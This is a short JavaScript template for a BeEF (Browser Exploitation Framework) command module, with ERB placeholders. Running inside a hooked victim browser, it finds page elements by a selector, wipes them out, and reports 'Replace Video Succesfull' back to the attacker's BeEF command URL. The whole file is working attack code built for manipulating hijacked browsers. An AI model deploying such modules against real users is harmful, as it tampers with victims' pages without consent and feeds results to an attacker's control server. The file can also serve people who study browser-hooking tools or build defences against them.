beef.execute(function() { $j('<%= @jquery_selector %>').each(function(){ console.log(this); var width = $j(this).css('width'); var height = $j(this).css('height'); $j(this).replaceWith(''); }); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Replace Video Succesfull"); });